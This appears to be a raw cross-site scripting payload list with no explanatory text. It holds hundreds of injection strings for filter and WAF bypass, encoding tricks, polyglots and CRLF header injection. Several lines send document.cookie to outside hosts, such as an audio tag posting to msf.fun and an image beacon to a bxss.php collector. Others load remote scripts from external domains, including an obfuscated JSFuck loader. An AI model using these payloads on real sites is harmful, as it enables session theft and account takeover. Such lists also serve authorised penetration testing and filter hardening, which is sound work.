5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%28%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%5D%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%29%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%29%28%29%28%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%2B%5B%2B%21%2B%5B%5D%5D%2B%28%5B%2B%5B%5D%5D%2B%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%29
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC=" &#14;  javascript:alert('XSS');">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<<SCRIPT>alert("XSS");//\<</SCRIPT>
<IMG SRC="`<javascript:alert>`('XSS')"
</script><script>alert('XSS');</script>
'"><A HRef=" AutoFocus OnFocus=top/**/?.'ale'%2B'rt'>"
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<svg/onload=alert('XSS')>
&quot;&gt;&lt;svg onload=alert&amp;amp;#x00000040&quot;1&quot;&gt;	
&lt;svg onload=&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116(1)&gt;	
&lt;svg/onload=&#39;alert&amp;#40 23 &amp;#41;&#39;&gt;	
&quot;&gt;&lt;svg onload=alert&amp;#x2F;&#x00000040&quot;1&quot;&gt;	
&quot;&gt;&lt;svg onload=alert&amp;amp;#x27;&#x00000040&quot;1&quot;&gt;	
&rdquo;&gt;&lt;svg onload=alert&amp;#000000040&quot;1&quot;&gt;	
&quot;&gt;&lt;svg onload=alert&amp;#x27;&#x00000040&quot;1&quot;&gt;	
&quot;&gt;&lt;SVG ONLOAD=&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116(&amp;#x64&amp;#x6f&amp;#x63&amp;#x75&amp;#x6d&amp;#x65&amp;#x6e&amp;#x74&amp;#x2e&amp;#x64&amp;#x6f&amp;#x6d&amp;#x61&amp;#x69&amp;#x6e)&gt;	
&quot;&gt;&lt;svg onload=alert&amp;#x27;&#x00000040&quot;1&quot;&gt;	
PHN2ZyBvbmxvYWQ9YWxlcnQmYWxlcnQoMjMgKT4=
PHN2Zy9vbmxvYWQ9J2FsZXJ0Jz4=
%22%3E%3Csvg%20onload%3Dalert%26amp%3B%26amp%3B%23x00000040%221%22%29%3E	
%3Csvg%20onload%3D%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%28%26%231%3B%29%3E	
%3Csvg%2Fonload%3D'alert%26%2340%2023%20%26%2341'%3E	
<BGSOUND SRC="javascript:alert('XSS');">
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;
<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div">
<img/src/onerror="(function(x){this[x+`ert`](1)})`al`">
<img/src/onerror="window[ al+/e/['ex + ec]'e'+'rt'](2)">
<svg/&parameter=onload=alert()>
<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a">
<audio autoplay onloadstart=this.src='hxxps://msf.fun/?c='+document["cook"+"ie"]' src=x>
<"><details/open/ontoggle="jAvAsCrIpT&colon;alert&lpar;/xss-by-tarun/&rpar;">XXXXX</a>
<svg/onload=self[`aler`%2b`t`]`1`>
%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E
>><marquee loop=1 width=0 onfinish=alert(1)>
<a href=&#01javascript:alert(1)>
<a href=javascript&colon;confirm(1)>
<a href="jav%0Dascript&colon;alert(1)">
<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme 
tarun"><x/onafterscriptexecute=confirm%26lpar;)// 
<a/href=%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x0a;:alert(1)>please%20click%20here</a>
%uff1cscript%uff1ealert(‘XSS’);%uff1c/script%uff1e
<%tag onmouseover="alert('markitzeroday.com')">
%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e
%uff3c%uff73%uff6cr%uff69%uff63%uff74%uffe0alert('XSS')%uff3e
%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u003ealert('XSS')%u003c%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003e
%uff3c%uff73%uff63%uff72%uff69%uff70%uff74%uff3ealert('XSS')%uff3c%uff2f%uff73%uff63%uff72%uff69%uff70%uff74%uff3e
%uff3cscript%uff3ealert('XSS')%uff3c/script%uff3e
%3Cscript%3Ealert('XSS')%3C/script%3E
%u003Cscript%u003Ealert('XSS')%u003C/script%u003E
%253Cscript%253Ealert('XSS')%253C/script%253E
%uff3c%uff73%uff63%uff72%uff69%uff70%uff74%uffe0alert('XSS')%uff3e
%u0025u0073u0063u0072u0069u0070u0074u003Ealert('XSS')%u003C%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003E
&lt;script&gt;alert('XSS')&lt;/script&gt;
%25253Cscript%25253Ealert('XSS')%25253C%252Fscript%25253E
<svg/onload='+/"`/+/onmouseover=1/+/[*/[]/+alert(42);//'>
\<a onmouseover=alert(document.cookie)\>xxs link\</a\>
<IMG SRC=# onmouseover="alert('xxs')">
%3B%C3%81=![]%3B%C3%89=!![]%3B%C3%8D=[][[]]%3B%C3%93=%2B[![]]%3BSI=%2B(%2B!%2B[]%2B(!%2B[]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B[%2B!%2B[]]%2B[%2B[]]%2B[%2B[]]%2B[%2B[]])%3BST=([]%2B[])%3B%C3%9C=(%2B[])%3BA=(%C3%81%2B%22%22)[1]%3BD%20=%20(%C3%8D%2B%22%22)[2]%3BE%20=%20(%C3%89%2B%22%22)[3]%3BF%20=%20(%C3%81%2B%22%22)[0]%3BG%20=%20[![]%2B[%2B[]]%2B[[]%2B[]][%2B[]][[![]%2B%7B%7D][%2B[]][%2B!%2B[]%2B[%2B[]]]%2B[[]%2B%7B%7D][%2B[]][%2B!%2B[]]%2B[[][[]]%2B[]][%2B[]][%2B!%2B[]]%2B[![]%2B[]][%2B[]][!%2B[]%2B!%2B[]%2B!%2B[]]%2B[!![]%2B[]][%2B[]][%2B[]]%2B[!![]%2B[]][%2B[]][%2B!%2B[]]%2B[[][[]]%2B[]][%2B[]][%2B[]]%2B[![]%2B%7B%7D][%2B[]][%2B!%2B[]%2B[%2B[]]]%2B[!![]%2B[]][%2B[]][%2B[]]%2B[[]%2B%7B%7D][%2B[]][%2B!%2B[]]%2B[!![]%2B[]][%2B[]][%2B!%2B[]]]][%2B[]][!%2B[]%2B!%2B[]%2B[%2B[]]]%3BI%20=%20([%C3%81]%2B%C3%8D)[10]%3BL%20=%20(%C3%81%2B%22%22)[2]%3BT%20=%20(%C3%89%2B%22%22)[0]%3BO%20=%20(%C3%89%2B[][F%2BI%2BL%2BL])[10]%3BR%20=%20(%C3%89%2B%22%22)[1]%3BN%20=%20(%C3%8D%2B%22%22)[1]%3BM%20=%20(%2B(208))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](31)[1]%3BP%20=%20(%2B(211))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](31)[1]%3BS%20=%20(%C3%81%2B%22%22)[3]%3BU%20=%20(%C3%8D%2B%22%22)[0]%3BV%20=%20(%2B(31))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](32)%3BX%20=%20(%2B(101))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](34)[1]%3BY%20=%20(%C3%93%2B[SI])[10]%3BZ%20=%20(%2B(35))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](36)%3BC%20=%20([][F%2BI%2BL%2BL]%2B%22%22)[3]%3BH%20=%20(%2B(101))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](21)[1]%3BK%20=%20(%2B(20))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](21)%3BW%20=%20(%2B(32))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](33)%3BJ%20=%20([][E%2BN%2BT%2BR%2BI%2BE%2BS]()%2B%22%22)[3]%3BB%20=%20([][E%2BN%2BT%2BR%2BI%2BE%2BS]()%2B%22%22)[2]%3BDOT%20=%20(%2B(%2211E100%22)%2B[])[1]%3BSLA=(![]%2B[%2B![]])[([![]]%2B[][[]])[%2B!%2B[]%2B[%2B[]]]%2B(!![]%2B[])[%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B([![]]%2B[][[]])[%2B!%2B[]%2B[%2B[]]]%2B([][(![]%2B[])[%2B[]]%2B([![]]%2B[][[]])[%2B!%2B[]%2B[%2B[]]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(!![]%2B[])[%2B[]]%2B(!![]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B(!![]%2B[])[%2B!%2B[]]]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]]()[%2B!%2B[]%2B[%2B[]]]%3B[][F%2BI%2BL%2BL][C%2BO%2BN%2BS%2BT%2BR%2BU%2BC%2BT%2BO%2BR](S%2BE%2BT%2B%22T%22%2BI%2BM%2BE%2BO%2BU%2BT%2B%22(%22%2BF%2BU%2BN%2BC%2BT%2BI%2BO%2BN%2B%22()%7B%20$%22%2BDOT%2BG%2BE%2BT%2B%22S%22%2BC%2BR%2BI%2BP%2BT%2B%22('%22%2BSLA%2BSLA%2B%22BADASSDOMAIN%22%2BDOT%2B%22COM%22%2BSLA%2B%22BADASSURL')()%3B%20%7D,%203000)%3B%22)()%3B(%22
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
><img/onerror="javascript:alert(1%26%23x000000029;" src=x>
"><iframe/src="javascript:alert(1%26%23x00000000000000000000000000029;"></iframe>
window['alXert'.replace(/X/, '')](self['document']['cookie'])
#prettyPhoto%3Cimg%20src=x%20onerror=prompt(document.cookie)%3E;//
?&q&zzz%27onmou%3Cseover=1&ale%3Crt(%27xsp%27%3C)%3C%3B1%3B%20//
zzz%27onmou%3Cseover=1&ale%3Crt(%27xsp%27%3C)%3C%3B1%3B%20//
<img/src=a onerror="window['alert'](document.cookie)"/>
<script src=//0-a.nl/conf.js></script>
<iframe src="javascript:alert('XSS')"></iframe>
<input type="text" value="javascript:alert('XSS')">
<form action="javascript:alert('XSS')">
"><script>alert(1)</script><"
javascript:/*'-alert(1)-'*/
javascript:document.body.onclick=alert(1)
123456%22/%3E%3Cmath%3E%3Carchy%20href=Ja%26Tab;vascript%26colon;console.error(1)%3EARCHY%3C/archy%3E%3C/math%3E%3C!--
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
javascript:var img=document.createElement('img');img.src='';document.body.appendChild(img);img.onerror=alert(1)
javascript:var a=document.createElement('a');a.href='javascript:alert(1)';document.body.appendChild(a)
<script>alert('\u0031')</script>
&#x3C;script&#x3E;alert(1)&#x3C;&#x2F;script&#x3E;
" onfocus="alert(1)" autofocus="
<audio src="nonexistent.mp3" onerror="alert(1)"></audio>
?query=<img/src/onerror=alert(`ibro`)>
?query="><img src=x onerror=prompt(document.domain);>
en-us/Search#/?search="><img src=x onerror=prompt(document.domain);>
search?q=<img/src/onerror=alert(`ibro`)>
Search/Results?q=<img/src/onerror=alert(`ibro`)>
Search/Results?q="><img src=x onerror=prompt(document.domain);>
redirect?url=javascript://%250Aalert(document.domain)
redirect.asp?url=javascript://%250Aalert(document.domain)
redirect.aspx?url=javascript://%250Aalert(document.domain)
q=javascript:alert(document.domain)
guest/msft_a_guest_register.php?_browser=1&title="><svg/onload=alert(1)>
(A("onerror='alert`1`'testabcd))/
onerror="alert('XSS')"
pods/ppt.aspx?&fileName=')}, 1000); alert('xss')://
')}, 1000); alert('xss')://
<!--xss"><img src=x onerror=prompt(document.domain)>-->
%253Cimg%2520src%253Dx%2520onerror%253Dalert%2528%2529%253E
'; x=eval; </script> <svg onpointerenter=alert()%20z= alert >
mrco24"type=image src onerror="alert(1)"
"><script akdk> prompt(document.domain)</script akdk>
foo?q=foo<script>alert('xss')<%2fscript>
Login.aspx?username=<img/src/onerror=alert(ibro)>
<details open ontoggle="alert(1)"><summary>Click me!</summary></details>
<iframe srcdoc="<script>alert(1)</script>"></iframe>
<img src="javascript:alert('XSS')" alt="Image">
<Img Src=OnXSS OnError=confirm(document.cookie)>
tagName%2BinnerHTML%2Blocation.hash%3E/*click%20me!#*/alert(document.domain)
xxxxxxxxx'});});</script><script>prompt("PLEASE%20\nSUBSCRIBE")</script>
xxxxxxxxx'});}); </script><script>prompt ("PLEASE%20\nSUBSCRIBE") </script>
<img src=x onerror=print()>
javascript://'/</title></style></textarea></script>--><p%22%20%0D%20%0A%20onclick%3Dalert(123)%2F%2F%3E*%2Falert()%2F*%3Cimg%20src%3Dx%20onerror%3Dalert(456)%2F%3E%3Csvg%2Fonload%3Dprompt(789)%2F%3E%3B'%22%2F%2F%20%3A%3Bfn()%3B%0A%0D%0A%0D%0A%0D%0A%09{{12*12+'Audi%20RS5'.substr(0,4)}}XXX%3Cscript%3Ealert('XSS')
javascript://%2F%2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fscript%3E--%3E%3Cp%22%20%0D%20%0A%20onclick%3Dalert(123)%2F%2F%3E*%2Falert()%2F*%3Cimg%20src%3Dx%20onerror%3Dalert(456)%2F%3E%3Csvg%2Fonload%3Dprompt(789)%2F%3E%3B%27%22%2F%2F%20%3A%3Bfn()%3B%0A%0D%0A%0D%0A%0D%0A%09{{12*12+'Audi%20RS5'.substr(0,4)}}XXX%3Cscript%3Ealert('XSS')
javascript://%2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fscript%3E--%3E%3Cp%22%20%0D%20%0A%20onclick%3Dalert(123)%2F%2F%3E*%2Falert()%2F*%3Cimg%20src%3Dx%20onerror%3Dalert(456)%2F%3E%3Csvg%2Fonload%3Dprompt(789)%2F%3E%3B'%22%2F%2F%20%3A%3Bfn()%3B%0A%0D%0A%0D%0A%0D%0A%09{{12*12+'Audi%20RS5'.substr(0,4)}}XXX%3Cscript%3Ealert('XSS')
#jaVasCript:/*-/*/*\/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e
`javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert(123)//>/alert()/
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'
#jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e
javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert(123)//>*/alert()/*<img src=x onerror=alert(456)/><svg/onload=prompt(789)/>;'"// :;fn();%0a%0d\n\r\t{{12*12+'Audi RS5'.substr(0,4)}}XXX<script>alert('XSS')
javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert(123)//>*/alert()/*
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
javascript:/*/*/**/**/**/*%0D%0A%0d%0a*//**/oNclick-alert())//</style/</title/</textarEa/</script/->\x3ciframe/<iframe/oNloAd-alert(1)//>\x3e
javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert(123)//>*/alert()/*<img src=x onerror=alert(456)/><svg/onload=prompt(789)/>;'"// :;fn();%0a%0d\n\r\t{{12*12+'Audi RS5'.substr(0,4)}}XXX<script>alert('XSS')<img src=x onerror='(function s(){var i=new Image();i.src='http://bl4de.tech/bxss.php?c='+document.cookie+';'+encodeURIComponent(location.href);document.body.append(i)})()'/>#jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e
"onmouseover="alert(1)
"onmouseover=alert(1)
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE
%E5%98%8D%E5%98%8ASet-Cookie%3A%20whoami%3Dthecyberneh%25u2028%25u2029XSS-Payload%3A%2520%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%0D%0A%0D%0A%3Cscript%3E%0D%0A%20alert(1);%0D%0A%3C/script%3E%0D%0A
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE%0D%0A%0D%0A<script>%0D%0Aalert(1);%0D%0A</script>
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0d%0a%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%0d%0aX-XSS-Protection:0%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--
%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
<a"/onclick=(confirm)()>elcezeri!
"><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">
<svg onload=alert(document.domain)>
xss"><!--><svg/onload=alert(document.domain)>
"><A%20%252F=""Href=%20JavaScript:k=%27a%27,top[k%2B%27lert%27](origin)>
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
%3Cimg src='null' onerror=alert('spyerror')%3E
<s\Cr\ipt\>alert(document\.cookie)<\/s\Cr\ipt\>\;\/>
<details/open=/Open/href=/data=;+ontoggle="(alert)(document.domain)
<object/data="javascript&colon;alert/**/(document.domain)">//
<iframe src="javasc%0a%0dript:alert(0);">
%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(%22XSS%22)%3E
&quot;&gt;&lt;img src=x onerror=prompt(&quot;XSS&quot;)&gt;
"\">" + "<img src=x onerror=prompt('XSS')>" + "\""
"><img&#x20;src=x&#x20;onerror=prompt('XSS')>"
"><body/onload="{x:onerror=alert};x"
%3csvg/onload=window%5b%22al%22+%22ert%22%5d1337`%3e
"><img src=x onerrora=confirm() onerror=confirm(1)>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
#"onmouseover="alert(1)
#javascript:alert(1)
javascript:alert(1)
"'><img src=q onerror=alert(1)>
<img/ignored=()%0Asrc=x%0Aonerror=prompt(1)>
'-setTimeout`prompt\u0028document.domain\u0029`-'
}}}</script><script>alert(1)</script>
alert?.(document?.cookie)
<--`<img/src=`%20onerror=confirm``>%20--!>
{{&lt;svg/onload=prompt(&quot;XSS&quot;)&gt; }}
javascript:alert(1)?q=%26callback%3Durc_button.click%23
#&quot;-alert(1)}//
test+(<script>alert(0)</script>)...
test@example(<script>alert(0)</s...
"<script>alert(0)</script>"@gmai...
#&#39;-alert(1)-&#39;
&#39;-alert(1)-&#39;
themecolor=%22-alert('XSS')-%22
<IFRAME SRC="javascript:alert(document.cookie);"></iframe>'
<details open id="' &quot;'"ontoggle=alert(1)>
%22-alert('XSS')-%22
#&lt;img&#47;src&#47;onerror=alert(`ibro`)&gt;
#&lt;script&gt;prompt(document.domain)&lt;&#47;script&gt;
JavaScript://%250Dtop.confirm?.(1)//
#"><img src=x onerror=prompt(document.domain);>
1')"<!--><Svg OnLoad=(confirm)(1)<!--
amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=
<script>prompt(document.domain)</script>
#<script>prompt(document.domain)</script>
-->""/></script><deTailS open x=">" ontoggle=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
<script x>alert('XSS')<script y>
<script>onerror=alert;throw 1337</script>
<object onafterscriptexecute=confirm(0)>
xyz';"/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)>
<img/src='1'/onerror=alert(0)>
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
<svgonload=alert(1)>
"><svg/onload=confirm(1)>"@x.y
<img/src/onerror=alert(`ibro`)>
<svg onload=alert%26%230000000040"")>
#<img/src/onerror=alert(`ibro`)>
'-alert(1)-'
#'-alert(1)-'
#\"-alert(1)}//
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
>"'><script>alert(2);</script>
>'"><script>alert(2);</script>
+alert(1)+
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
>'><script>alert(2);</script>
>'"><img src=x onerror=script(2);>
& lt;script&gt;alert(2);& lt;/script&gt;
& apos;><script>alert(2);</script>
!');script(2);//
$("script(2)")
[[constructor.constructor('alert(document.cookie)')()]]
['script'](2)
123')});alert(1);(()=>{('
&#x27;&lt;script&gt;alert(1)&lt;/script&gt;&#x27;
&#x27;javascript:alert(2)&#x27;
#x27;&lt;img src=1 onerror=alert(1)&gt;&#x27;
&#x27;&quot;&lt;img src=1 onerror=alert(1)&gt;&quot;&#x27;
&#x27;&quot;&gt;&lt;img src=x onerror=prompt(document['domain']);&gt;&#x27;
" /> <script>alert('XSS Testing");</script> 
');alert(1)//
<math><x xlink:href=javascript:confirm`1`>click
" accesskey='x' onclick='confirm`1`' //
<x/oncopy=alert()>x
a=8,b=confirm,c=window,c.onerror=b;throw-a
<?tag x="-->" test="<img src=x onerror=alert(1)//">
<java contentEditable='' autofocus='' onfocus=location=tagName+innerHTML+location.hash>script:/*#*/alert(1)
new Function`a\l\ert\`1\``
url=%26%2302java%26%23115cript:alert(document.domain)
?url=%26%2302java%26%23115cript:alert(document.domain)
`'";//><img/src=x onError="${x};alert(`1`);">
`'";//><Img Src=a OnError=location=src>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
</script><script>confirm(document.cookie)</script>
<sCriPt>confirm(documen.cookie)</ScRipt>
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
')}, 1000);alert("xss");//
1'"();<test><ScRiPt>window.alert("XSS_WAF_BYPASS")</ScRiPt>
1'"();<test><iframe onload="window.alert('XSS_WAF_BYPASS')"></iframe>
<body onload="window.alert('XSS_WAF_BYPASS')">
